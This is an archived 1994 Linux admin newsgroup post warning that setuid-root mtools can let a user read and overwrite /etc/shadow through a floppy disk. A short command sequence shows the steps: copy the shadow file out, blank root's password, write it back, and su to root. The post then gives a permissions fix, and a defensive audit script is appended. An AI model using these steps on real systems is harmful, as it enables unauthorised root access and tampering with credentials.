Setup dependent probable security hole

Post by Disaster prone simplet » Sat, 16 Apr 1994 02:56:26

Path: ecs.ox.ac.uk!m91dps
Newsgroups: comp.os.linux.admin
Subject: Possible security hole (software version/setup dependent)
Expires:
References:
Sender:
Followup-To:
Distribution: world
Organization: Oxford University Undergraduate Engineering & Comp Sci Lab, UK
Keywords:

The following security hole may or may not be present on your system.
If you have your mtools setuid root the following could well be possible
if you have a mess-dos disc in the floppy drive...
cracker% mwrite /etc/shadow A:
cracker% mread A:shadow hehe
cracker% <upload and edit hehe so root has no password>
cracker% <upload diddled /etc/shadow>
cracker% mwrite diddled A:
cracker% mread diddled /etc/shadow
cracker% su root

If this security hole is present on your system try:
chgrp fdisc /dev/fd*
chmod 660 /dev/fd*
chgrp fdisc /usr/bin/<mtools>
chmod a-s,g+s /usr/bin/<mtools>

(The presence or absence of this hole is obviously dependent on what version
of the mtools you use and how it is set up).

Duncan (-:
"I'll try it on my system sometime soon... it was just a cute idea I had"

P.S. If you have / as a dos disc and the emulator setuid root make sure that
crackers can't use the dos emulator to give you an alternative version
of things you don't want them to (e.g. /etc/shadow).
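An added audit helper, not part of Duncan's post and not mtools' own code, that checks the two conditions the post combines: an mtools binary carrying the setuid bit, and a floppy device node writable beyond its owner. It parses only the mode string from POSIX `ls -ld`, so it works on any Unix; the binary and device paths are passed as arguments and are assumptions, as is the `fdisc` group name the post uses. The recommended fix is printed rather than applied, since it needs root and an existing group.

```shell
#!/bin/sh
# Added audit helper (not from the original post, not mtools' own code).
# It checks what the post relies on: a setuid binary that talks to the
# floppy directly, and a floppy device node that is open to group or world.
# Only POSIX ls is used, so it runs on any Unix.

# Symbolic mode string of a path, e.g. "-rwsr-xr-x" (empty if missing).
mode_of() {
    ls -ld "$1" 2>/dev/null | cut -c1-10
}

# Succeeds when the setuid bit is set (4th character is 's' or 'S').
is_setuid() {
    case "$(mode_of "$1")" in
        ???[sS]??????) return 0 ;;
        *) return 1 ;;
    esac
}

# Succeeds when group or other may write (6th or 9th character is 'w').
is_group_or_world_writable() {
    case "$(mode_of "$1")" in
        ?????w????|????????w?) return 0 ;;
        *) return 1 ;;
    esac
}

# Prints one finding per line for each path given: SETUID for regular files
# carrying the setuid bit, WRITABLE for device nodes open beyond the owner.
# Paths that do not exist are skipped silently.
audit_paths() {
    for p in "$@"; do
        [ -e "$p" ] || continue
        if [ -c "$p" ] || [ -b "$p" ]; then
            is_group_or_world_writable "$p" && echo "WRITABLE $p"
        else
            is_setuid "$p" && echo "SETUID $p"
        fi
    done
    return 0
}

# Number of findings, normalised to a bare integer (wc pads on some systems).
count_findings() {
    echo $(( $(audit_paths "$@" | wc -l) ))
}

# The remediation the post recommends, printed rather than applied: it needs
# root and assumes an "fdisc" group exists (the group name is from the post).
suggest_fix() {
    echo "chgrp fdisc /dev/fd*"
    echo "chmod 660 /dev/fd*"
    echo "chgrp fdisc $1"
    echo "chmod a-s,g+s $1"
}

# Stand-alone use, with assumed paths:
#   sh audit_mtools.sh /usr/bin/mread /usr/bin/mwrite /dev/fd0
if [ $# -gt 0 ]; then
    audit_paths "$@"
    [ "$(count_findings "$@")" -eq 0 ] || suggest_fix '/usr/bin/<mtools>'
fi
```

The device check and the setuid check are deliberately separate findings: either one alone is harmless, and the post's point is that the combination lets an ordinary user bypass file permissions through the raw floppy, so both lines appearing in the output is the signal to act on.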